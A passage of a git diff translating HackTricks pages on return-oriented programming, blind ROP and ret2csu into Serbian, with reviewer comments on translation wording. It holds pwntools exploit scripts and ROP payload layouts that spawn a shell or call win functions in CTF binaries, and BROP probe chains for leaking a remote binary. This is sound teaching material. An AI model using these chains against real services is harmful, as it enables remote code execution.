**system()**) i zatim pozovemo **system()** funkciju. Pretpostavićemo da smo identifikovali sledeće gadgete: -- **pop rdi; ret**: Pops the top value of the stack into **RDI** and then returns. 
Essential for setting our argument for **system()**. -- **ret**: A simple return, useful for stack alignment in some scenarios. +- **pop rdi; ret**: Uzimanje gornje vrednosti steka u **RDI** i zatim vraćanje. Neophodno za postavljanje našeg argumenta za **system()**. +- **ret**: Jednostavno vraćanje, korisno za poravnavanje steka u nekim scenarijima. -And we know the address of the **system()** function. +I znamo adresu **system()** funkcije. ### **ROP Chain** -Below is an example using **pwntools** to set up and execute a ROP chain aiming to execute **system('/bin/sh')** on **x64**: - +Ispod je primer korišćenja **pwntools** za postavljanje i izvršavanje ROP lanca koji ima za cilj da izvrši **system('/bin/sh')** na **x64**: ```python from pwn import * @@ -115,10 +112,10 @@ ret_gadget = 0xdeadbeefdeadbead # ret gadget for alignment, if necessary # Construct the ROP chain rop_chain = [ - ret_gadget, # Alignment gadget, if needed - pop_rdi_gadget, # pop rdi; ret - bin_sh_addr, # Address of "/bin/sh" string goes here, as the argument to system() - system_addr # Address of system(). Execution will continue here. +ret_gadget, # Alignment gadget, if needed +pop_rdi_gadget, # pop rdi; ret +bin_sh_addr, # Address of "/bin/sh" string goes here, as the argument to system() +system_addr # Address of system(). Execution will continue here. ] # Flatten the rop_chain for use 
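Review bot: the headings `## ROP Chain in x64 Example`, `### **x64 (64-bit) Calling conventions**`, `#### **Finding Gadgets**` and `### **ROP Chain**` stay in English in this hunk although their x86 counterparts were translated ("ROP Lanac u x86 Primeru", "Pronalaženje Gadgets", "ROP Lanac"); translate them for consistency. The blank line before the ```python fence after "na **x64**:" is also removed; keep it as in the original.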
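Review bot: the `@@ -115,10 +112,10 @@` hunk is the same indentation-only edit to the x64 `rop_chain` list (`-    pop_rdi_gadget,` to `+pop_rdi_gadget,`) with the comments left in English; it is a code change with no translation value and should be dropped so the fenced block stays identical to the source.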
@@ -130,66 +127,65 @@ payload = fit({offset: rop_chain}) p.sendline(payload) p.interactive() ``` +U ovom primeru: -In this example: +- Koristimo **`pop rdi; ret`** gadget da postavimo **`RDI`** na adresu **`"/bin/sh"`**. +- Direktno skačemo na **`system()`** nakon postavljanja **`RDI`**, sa adresom **system()** u lancu. +- **`ret_gadget`** se koristi za poravnavanje ako ciljno okruženje to zahteva, što je češće u **x64** da bi se osiguralo pravilno poravnavanje steka pre pozivanja funkcija. -- We utilize the **`pop rdi; ret`** gadget to set **`RDI`** to the address of **`"/bin/sh"`**. -- We directly jump to **`system()`** after setting **`RDI`**, with **system()**'s address in the chain. -- **`ret_gadget`** is used for alignment if the target environment requires it, which is more common in **x64** to ensure proper stack alignment before calling functions. +### Poravnavanje Steka -### Stack Alignment +**x86-64 ABI** osigurava da je **stek poravnat na 16 bajtova** kada se izvrši **call instrukcija**. **LIBC**, radi optimizacije performansi, **koristi SSE instrukcije** (kao što je **movaps**) koje zahtevaju ovo poravnavanje. Ako stek nije pravilno poravnat (što znači da **RSP** nije višekratnik 16), pozivi funkcijama kao što je **system** će propasti u **ROP lancu**. Da biste to ispravili, jednostavno dodajte **ret gadget** pre pozivanja **system** u vašem ROP lancu. -**The x86-64 ABI** ensures that the **stack is 16-byte aligned** when a **call instruction** is executed. **LIBC**, to optimize performance, **uses SSE instructions** (like **movaps**) which require this alignment. If the stack isn't aligned properly (meaning **RSP** isn't a multiple of 16), calls to functions like **system** will fail in a **ROP chain**. To fix this, simply add a **ret gadget** before calling **system** in your ROP chain. 
- -## x86 vs x64 main difference +## Glavna razlika između x86 i x64 > [!TIP] -> Since **x64 uses registers for the first few arguments,** it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. The increased number of registers and the larger address space in **x64** architecture provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP). +> Pošto **x64 koristi registre za prvih nekoliko argumenata,** često zahteva manje gadgeta nego x86 za jednostavne pozive funkcija, ali pronalaženje i povezivanje pravih gadgeta može biti složenije zbog povećanog broja registara i većeg adresnog prostora. Povećan broj registara i veći adresni prostor u **x64** arhitekturi pružaju i prilike i izazove za razvoj eksploatacija, posebno u kontekstu Programiranja Orijentisanog na Povratak (ROP). -## ROP chain in ARM64 Example +## ROP lanac u ARM64 primeru -### **ARM64 Basics & Calling conventions** +### **Osnovne informacije o ARM64 i konvencije pozivanja** -Check the following page for this information: +Proverite sledeću stranicu za ove informacije: {{#ref}} ../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} -## Protections Against ROP +## Zaštite protiv ROP -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): These protections makes harder the use of ROP as the addresses of the gadgets changes between execution. -- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/): In of a BOF, it's needed to bypass the stores stack canary to overwrite return pointers to abuse a ROP chain -- **Lack of Gadgets**: If there aren't enough gadgets it won't be possible to generate a ROP chain. 
+- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/): Ove zaštite otežavaju korišćenje ROP-a jer se adrese gadgeta menjaju između izvršavanja. +- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/): U slučaju BOF-a, potrebno je zaobići skladištenje stack canary da bi se prepisali povratni pokazivači za zloupotrebu ROP lanca. +- **Nedostatak Gadgeta**: Ako nema dovoljno gadgeta, neće biti moguće generisati ROP lanac. -## ROP based techniques +## Tehnike zasnovane na ROP-u -Notice that ROP is just a technique in order to execute arbitrary code. Based in ROP a lot of Ret2XXX techniques were developed: +Imajte na umu da je ROP samo tehnika za izvršavanje proizvoljnog koda. Na osnovu ROP-a razvijene su mnoge Ret2XXX tehnike: -- **Ret2lib**: Use ROP to call arbitrary functions from a loaded library with arbitrary parameters (usually something like `system('/bin/sh')`. +- **Ret2lib**: Koristi ROP za pozivanje proizvoljnih funkcija iz učitane biblioteke sa proizvoljnim parametrima (obično nešto poput `system('/bin/sh')`. {{#ref}} ret2lib/ {{#endref}} -- **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands. +- **Ret2Syscall**: Koristi ROP za pripremu poziva na syscall, npr. `execve`, i izvršava proizvoljne komande. {{#ref}} rop-syscall-execv/ {{#endref}} -- **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP). +- **EBP2Ret & EBP Chaining**: Prvi će zloupotrebiti EBP umesto EIP da kontroliše tok, a drugi je sličan Ret2lib, ali u ovom slučaju tok se kontroliše uglavnom sa EBP adresama (iako je takođe potrebno kontrolisati EIP). 
{{#ref}} ../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md {{#endref}} -## Other Examples & References +## Ostali primeri i reference - [https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions) - [https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html](https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html) - - 64 bit, Pie and nx enabled, no canary, overwrite RIP with a `vsyscall` address with the sole purpose or return to the next address in the stack which will be a partial overwrite of the address to get the part of the function that leaks the flag +- 64 bita, Pie i nx omogućeni, bez canary, prepisivanje RIP-a sa `vsyscall` adresom sa jedinom svrhom da se vrati na sledeću adresu u steku koja će biti delimično prepisivanje adrese da bi se dobila deo funkcije koja otkriva zastavicu - [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/) - - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack +- arm64, bez ASLR, ROP gadget za izvršavanje steka i skakanje na shellcode u steku {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md b/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md index 94d93bd6f..204378a68 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md +++ b/src/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md 
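Review bot: three renderings in this hunk change meaning. "potrebno je zaobići skladištenje stack canary" turns "the stored stack canary" into "the storing of the stack canary"; use "sačuvani stack canary". "ROP gadget za izvršavanje steka" says "gadget for executing the stack" where the English is "gadget to make stack executable"; use "ROP gadget koji stek čini izvršivim". "Programiranja Orijentisanog na Povratak (ROP)" translates a term the same file keeps as "Return-Oriented Programming (ROP)"; keep the English term. Minor: "da bi se dobila deo funkcije" should be "dobio deo".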
@@ -2,123 +2,123 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -The goal of this attack is to be able to **abuse a ROP via a buffer overflow without any information about the vulnerable binary**.\ -This attack is based on the following scenario: +Cilj ovog napada je da se **zloupotrebi ROP putem prelivanja bafera bez ikakvih informacija o ranjivom binarnom fajlu**.\ +Ovaj napad se zasniva na sledećem scenariju: -- A stack vulnerability and knowledge of how to trigger it. -- A server application that restarts after a crash. +- Ranjivost na steku i znanje o tome kako je aktivirati. +- Serverska aplikacija koja se ponovo pokreće nakon pada. -## Attack +## Napad -### **1. Find vulnerable offset** sending one more character until a malfunction of the server is detected +### **1. Pronađi ranjivi offset** slanjem jednog dodatnog karaktera dok se ne otkrije kvar servera -### **2. Brute-force canary** to leak it +### **2. Brute-force canary** da se otkrije -### **3. Brute-force stored RBP and RIP** addresses in the stack to leak them +### **3. Brute-force sačuvanih RBP i RIP** adresa na steku da se otkriju -You can find more information about these processes [here (BF Forked & Threaded Stack Canaries)](../common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md) and [here (BF Addresses in the Stack)](../common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md). +Možete pronaći više informacija o ovim procesima [ovde (BF Forked & Threaded Stack Canaries)](../common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md) i [ovde (BF Adrese na steku)](../common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md). -### **4. Find the stop gadget** +### **4. Pronađi stop gadget** -This gadget basically allows to confirm that something interesting was executed by the ROP gadget because the execution didn't crash. 
Usually, this gadget is going to be something that **stops the execution** and it's positioned at the end of the ROP chain when looking for ROP gadgets to confirm a specific ROP gadget was executed +Ovaj gadget u suštini omogućava potvrdu da je nešto zanimljivo izvršeno putem ROP gadgeta jer izvršenje nije srušeno. Obično, ovaj gadget će biti nešto što **zaustavlja izvršenje** i nalazi se na kraju ROP lanca kada se traže ROP gadgeti da se potvrdi da je specifičan ROP gadget izvršen. -### **5. Find BROP gadget** +### **5. Pronađi BROP gadget** -This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**: +Ova tehnika koristi [**ret2csu**](ret2csu.md) gadget. I to je zato što, ako pristupite ovom gadgetu usred nekih instrukcija, dobijate gadgete za kontrolu **`rsi`** i **`rdi`**:

https://www.scs.stanford.edu/brop/bittau-brop.pdf

-These would be the gadgets: +Ovo bi bili gadgeti: - `pop rsi; pop r15; ret` - `pop rdi; ret` -Notice how with those gadgets it's possible to **control 2 arguments** of a function to call. +Primetite kako je sa tim gadgetima moguće **kontrolisati 2 argumenta** funkcije koju pozivamo. -Also, notice that the ret2csu gadget has a **very unique signature** because it's going to be poping 6 registers from the stack. SO sending a chain like: +Takođe, primetite da ret2csu gadget ima **veoma jedinstvenu potpis** jer će iz steka izvući 6 registara. Dakle, slanjem lanca poput: `'A' * offset + canary + rbp + ADDR + 0xdead * 6 + STOP` -If the **STOP is executed**, this basically means an **address that is popping 6 registers** from the stack was used. Or that the address used was also a STOP address. +Ako je **STOP izvršen**, to u suštini znači da je korišćena **adresa koja izbacuje 6 registara** iz steka. Ili da je korišćena adresa koja je takođe STOP adresa. -In order to **remove this last option** a new chain like the following is executed and it must not execute the STOP gadget to confirm the previous one did pop 6 registers: +Da bi se **uklonila ova poslednja opcija**, izvršava se novi lanac poput sledećeg i ne sme izvršiti STOP gadget da potvrdi da je prethodni izbacivao 6 registara: `'A' * offset + canary + rbp + ADDR` -Knowing the address of the ret2csu gadget, it's possible to **infer the address of the gadgets to control `rsi` and `rdi`**. +Poznavajući adresu ret2csu gadgeta, moguće je **izvesti adresu gadgeta za kontrolu `rsi` i `rdi`**. -### 6. Find PLT +### 6. Pronađi PLT -The PLT table can be searched from 0x400000 or from the **leaked RIP address** from the stack (if **PIE** is being used). The **entries** of the table are **separated by 16B** (0x10B), and when one function is called the server doesn't crash even if the arguments aren't correct. Also, checking the address of a entry in the **PLT + 6B also doesn't crash** as it's the first code executed. 
+PLT tabela može se pretraživati od 0x400000 ili od **otkrivene RIP adrese** sa steka (ako se koristi **PIE**). **Unosi** tabele su **odvojeni po 16B** (0x10B), i kada se pozove jedna funkcija, server se ne sruši čak i ako argumenti nisu tačni. Takođe, provera adrese jednog unosa u **PLT + 6B takođe ne sruši** jer je to prvi kod koji se izvršava. -Therefore, it's possible to find the PLT table checking the following behaviours: +Stoga, moguće je pronaći PLT tabelu proverom sledećih ponašanja: -- `'A' * offset + canary + rbp + ADDR + STOP` -> no crash -- `'A' * offset + canary + rbp + (ADDR + 0x6) + STOP` -> no crash -- `'A' * offset + canary + rbp + (ADDR + 0x10) + STOP` -> no crash +- `'A' * offset + canary + rbp + ADDR + STOP` -> nema rušenja +- `'A' * offset + canary + rbp + (ADDR + 0x6) + STOP` -> nema rušenja +- `'A' * offset + canary + rbp + (ADDR + 0x10) + STOP` -> nema rušenja -### 7. Finding strcmp +### 7. Pronalazak strcmp -The **`strcmp`** function sets the register **`rdx`** to the length of the string being compared. Note that **`rdx`** is the **third argument** and we need it to be **bigger than 0** in order to later use `write` to leak the program. +Funkcija **`strcmp`** postavlja registar **`rdx`** na dužinu stringa koji se upoređuje. Imajte na umu da je **`rdx`** **treći argument** i potrebno je da bude **veći od 0** kako bismo kasnije koristili `write` da otkrijemo program. 
-It's possible to find the location of **`strcmp`** in the PLT based on its behaviour using the fact that we can now control the 2 first arguments of functions: +Moguće je pronaći lokaciju **`strcmp`** u PLT-u na osnovu njenog ponašanja koristeći činjenicu da sada možemo kontrolisati prva 2 argumenta funkcija: -- strcmp(\, \) -> crash -- strcmp(\, \) -> crash -- strcmp(\, \) -> crash -- strcmp(\, \) -> no crash +- strcmp(\, \) -> rušenje +- strcmp(\, \) -> rušenje +- strcmp(\, \) -> rušenje +- strcmp(\, \) -> nema rušenja -It's possible to check for this by calling each entry of the PLT table or by using the **PLT slow path** which basically consist on **calling an entry in the PLT table + 0xb** (which calls to **`dlresolve`**) followed in the stack by the **entry number one wishes to probe** (starting at zero) to scan all PLT entries from the first one: +Moguće je proveriti ovo pozivajući svaki unos PLT tabele ili koristeći **PLT spor put** koji se u suštini sastoji od **pozivanja unosa u PLT tabeli + 0xb** (što poziva **`dlresolve`**) praćeno na steku **brojem unosa koji se želi proveriti** (počinjajući od nule) da skeniramo sve PLT unose od prvog: -- strcmp(\, \) -> crash - - `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0x300) + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` -> Will crash -- strcmp(\, \) -> crash - - `b'A' * offset + canary + rbp + (BROP + 0x9) + p64(0x300) + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` -- strcmp(\, \) -> no crash - - `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` +- strcmp(\, \) -> rušenje +- `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0x300) + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` -> Rušiće +- strcmp(\, \) -> rušenje +- `b'A' * offset + canary + rbp + (BROP + 0x9) + p64(0x300) + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` +- strcmp(\, \) -> nema rušenja 
+- `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` -Remember that: +Zapamtite da: -- BROP + 0x7 point to **`pop RSI; pop R15; ret;`** -- BROP + 0x9 point to **`pop RDI; ret;`** -- PLT + 0xb point to a call to **dl_resolve**. +- BROP + 0x7 ukazuje na **`pop RSI; pop R15; ret;`** +- BROP + 0x9 ukazuje na **`pop RDI; ret;`** +- PLT + 0xb ukazuje na poziv **dl_resolve**. -Having found `strcmp` it's possible to set **`rdx`** to a value bigger than 0. +Nakon što se pronađe `strcmp`, moguće je postaviti **`rdx`** na vrednost veću od 0. > [!TIP] -> Note that usually `rdx` will host already a value bigger than 0, so this step might not be necesary. +> Imajte na umu da obično `rdx` već sadrži vrednost veću od 0, tako da ovaj korak možda nije neophodan. -### 8. Finding Write or equivalent +### 8. Pronalazak Write ili ekvivalentnog -Finally, it's needed a gadget that exfiltrates data in order to exfiltrate the binary. And at this moment it's possible to **control 2 arguments and set `rdx` bigger than 0.** +Na kraju, potreban je gadget koji eksfiltrira podatke kako bi se eksfiltrirao binarni fajl. I u ovom trenutku moguće je **kontrolisati 2 argumenta i postaviti `rdx` veći od 0.** -There are 3 common funtions taht could be abused for this: +Postoje 3 uobičajene funkcije koje bi mogle biti zloupotrebljene za ovo: - `puts(data)` - `dprintf(fd, data)` - `write(fd, data, len(data)` -However, the original paper only mentions the **`write`** one, so lets talk about it: +Međutim, originalni rad pominje samo **`write`**, pa hajde da pričamo o tome: -The current problem is that we don't know **where the write function is inside the PLT** and we don't know **a fd number to send the data to our socket**. +Trenutni problem je što ne znamo **gde se funkcija write nalazi unutar PLT-a** i ne znamo **fd broj da pošaljemo podatke našem soketu**. 
-However, we know **where the PLT table is** and it's possible to find write based on its **behaviour**. And we can create **several connections** with the server an d use a **high FD** hoping that it matches some of our connections. +Međutim, znamo **gde se nalazi PLT tabela** i moguće je pronaći write na osnovu njenog **ponašanja**. I možemo stvoriti **nekoliko veza** sa serverom i koristiti **visok FD** nadajući se da će se poklopiti sa nekim od naših veza. -Behaviour signatures to find those functions: +Potpis ponašanja za pronalaženje tih funkcija: -- `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0) + p64(0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> If there is data printed, then puts was found -- `'A' * offset + canary + rbp + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> If there is data printed, then dprintf was found -- `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + (RIP + 0x1) + p64(0x0) + (PLT + 0xb ) + p64(STRCMP ENTRY) + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> If there is data printed, then write was found +- `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0) + p64(0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> Ako se podaci ispisuju, onda je pronađen puts +- `'A' * offset + canary + rbp + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> Ako se podaci ispisuju, onda je pronađen dprintf +- `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + (RIP + 0x1) + p64(0x0) + (PLT + 0xb ) + p64(STRCMP ENTRY) + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> Ako se podaci ispisuju, onda je pronađen write -## Automatic Exploitation +## Automatska eksploatacija - [https://github.com/Hakumarachi/Bropper](https://github.com/Hakumarachi/Bropper) -## References +## Reference -- Original paper: 
[https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf) +- Originalni rad: [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf) - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md index 73cbb4e58..368fead80 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md 
@@ -4,18 +4,17 @@ ## -## [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)Basic Information +## [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)Osnovne informacije -**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior. +**ret2csu** je tehnika hakovanja koja se koristi kada pokušavate da preuzmete kontrolu nad programom, ali ne možete pronaći **gadgets** koje obično koristite za manipulaciju ponašanjem programa. -When a program uses certain libraries (like libc), it has some built-in functions for managing how different pieces of the program talk to each other. Among these functions are some hidden gems that can act as our missing gadgets, especially one called `__libc_csu_init`. +Kada program koristi određene biblioteke (kao što je libc), ima neke ugrađene funkcije za upravljanje načinom na koji različiti delovi programa komuniciraju jedni s drugima. Među tim funkcijama su neki skriveni dragulji koji mogu delovati kao naši nedostajući gadgets, posebno jedan pod nazivom `__libc_csu_init`. -### The Magic Gadgets in \_\_libc_csu_init +### Čarobni Gadgets u \_\_libc_csu_init -In **`__libc_csu_init`**, there are two sequences of instructions (gadgets) to highlight: - -1. The first sequence lets us set up values in several registers (rbx, rbp, r12, r13, r14, r15). These are like slots where we can store numbers or addresses we want to use later. +U **`__libc_csu_init`**, postoje dve sekvence instrukcija (gadgets) koje treba istaknuti: +1. Prva sekvenca nam omogućava da postavimo vrednosti u nekoliko registara (rbx, rbp, r12, r13, r14, r15). Ovo su kao slotovi gde možemo da čuvamo brojeve ili adrese koje želimo da koristimo kasnije. ```armasm pop rbx; pop rbp; 
@@ -25,22 +24,18 @@ pop r14; pop r15; ret; ``` +Ovaj uređaj nam omogućava da kontrolišemo ove registre tako što izbacujemo vrednosti sa steka u njih. -This gadget allows us to control these registers by popping values off the stack into them. - -2. The second sequence uses the values we set up to do a couple of things: - - **Move specific values into other registers**, making them ready for us to use as parameters in functions. - - **Perform a call to a location** determined by adding together the values in r15 and rbx, then multiplying rbx by 8. - +2. Druga sekvenca koristi vrednosti koje smo postavili da uradi nekoliko stvari: +- **Premesti specifične vrednosti u druge registre**, pripremajući ih za korišćenje kao parametre u funkcijama. +- **Izvršiti poziv na lokaciju** određenu sabiranjem vrednosti u r15 i rbx, a zatim množenjem rbx sa 8. ```armasm mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword [r12 + rbx*8]; ``` - -3. Maybe you don't know any address to write there and you **need a `ret` instruction**. Note that the second gadget will also **end in a `ret`**, but you will need to meet some **conditions** in order to reach it: - +3. Možda ne znate nijednu adresu na koju biste mogli da pišete i **potrebna vam je `ret` instrukcija**. Imajte na umu da će drugi gadget takođe **završiti sa `ret`**, ali ćete morati da ispunite neke **uslove** da biste do njega došli: ```armasm mov rdx, r15; mov rsi, r14; 
@@ -52,50 +47,46 @@ jnz ... ret ``` +Uslovi će biti: -The conditions will be: - -- `[r12 + rbx*8]` must be pointing to an address storing a callable function (if no idea and no pie, you can just use `_init` func): - - If \_init is at `0x400560`, use GEF to search for a pointer in memory to it and make `[r12 + rbx*8]` be the address with the pointer to \_init: - +- `[r12 + rbx*8]` mora da pokazuje na adresu koja čuva pozivnu funkciju (ako nemate ideju i nema pie, možete jednostavno koristiti funkciju `_init`): +- Ako je \_init na `0x400560`, koristite GEF da pretražite memoriju za pokazivač na nju i učinite da `[r12 + rbx*8]` bude adresa sa pokazivačem na \_init: ```bash # Example from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html gef➤ search-pattern 0x400560 [+] Searching '\x60\x05\x40' in memory [+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x400000-0x401000), permission=r-x - 0x400e38 - 0x400e44 → "\x60\x05\x40[...]" +0x400e38 - 0x400e44 → "\x60\x05\x40[...]" [+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x600000-0x601000), permission=r-- - 0x600e38 - 0x600e44 → "\x60\x05\x40[...]" +0x600e38 - 0x600e44 → "\x60\x05\x40[...]" ``` +- `rbp` i `rbx` moraju imati istu vrednost da bi se izbegao skok +- Postoje neki izostavljeni pops koje treba uzeti u obzir -- `rbp` and `rbx` must have the same value to avoid the jump -- There are some omitted pops you need to take into account +## RDI i RSI -## RDI and RSI - -Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets: +Još jedan način da kontrolišete **`rdi`** i **`rsi`** iz ret2csu gadgeta je pristupanje specifičnim ofsetima:


-Check this page for more info: +Proverite ovu stranicu za više informacija: {{#ref}} brop-blind-return-oriented-programming.md {{#endref}} -## Example +## Primer -### Using the call +### Korišćenje poziva -Imagine you want to make a syscall or call a function like `write()` but need specific values in the `rdx` and `rsi` registers as parameters. Normally, you'd look for gadgets that set these registers directly, but you can't find any. +Zamislite da želite da izvršite syscall ili pozovete funkciju kao što je `write()`, ali su vam potrebne specifične vrednosti u registrima `rdx` i `rsi` kao parametri. Obično biste tražili gadgete koji direktno postavljaju te registre, ali ne možete pronaći nijedan. -Here's where **ret2csu** comes into play: +Evo gde **ret2csu** dolazi u igru: -1. **Set Up the Registers**: Use the first magic gadget to pop values off the stack and into rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), and r15. -2. **Use the Second Gadget**: With those registers set, you use the second gadget. This lets you move your chosen values into `rdx` and `rsi` (from r14 and r13, respectively), readying parameters for a function call. Moreover, by controlling `r15` and `rbx`, you can make the program call a function located at the address you calculate and place into `[r15 + rbx*8]`. - -You have an [**example using this technique and explaining it here**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation), and this is the final exploit it used: +1. **Postavite Registre**: Koristite prvi magični gadget da izvučete vrednosti sa steka i smestite ih u rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx) i r15. +2. **Koristite Drugi Gadget**: Kada su ti registri postavljeni, koristite drugi gadget. Ovo vam omogućava da premestite izabrane vrednosti u `rdx` i `rsi` (iz r14 i r13, redom), pripremajući parametre za poziv funkcije. 
Štaviše, kontrolišući `r15` i `rbx`, možete naterati program da pozove funkciju smeštenu na adresi koju izračunate i stavite u `[r15 + rbx*8]`. +Imate [**primer korišćenja ove tehnike i objašnjenja ovde**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation), a ovo je konačni exploit koji je korišćen: ```python from pwn import * @@ -119,14 +110,12 @@ p.sendlineafter('me\n', rop.chain()) p.sendline(p64(elf.sym['win'])) # send to gets() so it's written print(p.recvline()) # should receive "Awesome work!" ``` - > [!WARNING] -> Note that the previous exploit isn't meant to do a **`RCE`**, it's meant to just call a function called **`win`** (taking the address of `win` from stdin calling gets in the ROP chain and storing it in r15) with a third argument with the value `0xdeadbeefcafed00d`. +> Imajte na umu da prethodni exploit nije namenjen za **`RCE`**, već samo da pozove funkciju pod nazivom **`win`** (uzimajući adresu `win` iz stdin pozivajući gets u ROP lancu i čuvajući je u r15) sa trećim argumentom čija je vrednost `0xdeadbeefcafed00d`. -### Bypassing the call and reaching ret - -The following exploit was extracted [**from this page**](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html) where the **ret2csu** is used but instead of using the call, it's **bypassing the comparisons and reaching the `ret`** after the call: +### Zaobilaženje poziva i dolazak do ret +Sledeći exploit je izvučen [**sa ove stranice**](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html) gde se koristi **ret2csu**, ali umesto korišćenja poziva, **zaobilazi poređenja i dolazi do `ret`** nakon poziva: ```python # Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html # This exploit is based off of: https://www.rootnetsec.com/ropemporium-ret2csu/ 
@@ -176,9 +165,8 @@ payload += ret2win target.sendline(payload) target.interactive() ``` +### Zašto ne koristiti libc direktno? -### Why Not Just Use libc Directly? - -Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**. +Obično su ovi slučajevi takođe ranjivi na [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), ali ponekad je potrebno kontrolisati više parametara nego što se lako može kontrolisati sa gadgetima koje direktno pronađete u libc. Na primer, `write()` funkcija zahteva tri parametra, i **pronalazak gadgeta za postavljanje svih ovih direktno možda neće biti moguć**. {{#include ../../banners/hacktricks-training.md}} diff --git 